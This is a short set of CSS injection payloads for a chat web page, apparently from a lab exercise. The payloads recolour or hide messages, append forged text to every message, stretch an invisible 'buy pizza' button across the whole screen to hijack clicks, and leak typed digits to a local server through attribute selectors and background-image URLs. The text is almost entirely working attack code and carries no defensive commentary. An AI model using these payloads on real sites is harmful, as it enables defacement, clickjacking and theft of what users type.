===== Change all messages font colors to red:
<style>
p {
    color: red;
}
</style>

===== Hide the message that Lesley sent:
<style>
p:first-child {
    display: none;
}
</style>

===== Set every message to something:
<style>
p:after {
    content: " Also, Josh is really cool.";
}
</style>

===== Fill the screen with an invisible buy pizza button:
<style>
.btn.orange {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    z-index: 9999;
    opacity: 0;
}
</style>

===== Steal the numbers that someone typed in (without hitting send):
<style>
#message[value="1"]  {background: url('http://127.0.0.1:8001/1');}
#message[value="2"]  {background: url('http://127.0.0.1:8001/2');}
#message[value="3"]  {background: url('http://127.0.0.1:8001/3');}
#message[value="4"]  {background: url('http://127.0.0.1:8001/4');}
#message[value="5"]  {background: url('http://127.0.0.1:8001/5');}
#message[value="6"]  {background: url('http://127.0.0.1:8001/6');}
#message[value="7"]  {background: url('http://127.0.0.1:8001/7');}
#message[value="8"]  {background: url('http://127.0.0.1:8001/8');}
#message[value="9"]  {background: url('http://127.0.0.1:8001/9');}
#message[value="10"] {background: url('http://127.0.0.1:8001/10');}
</style>
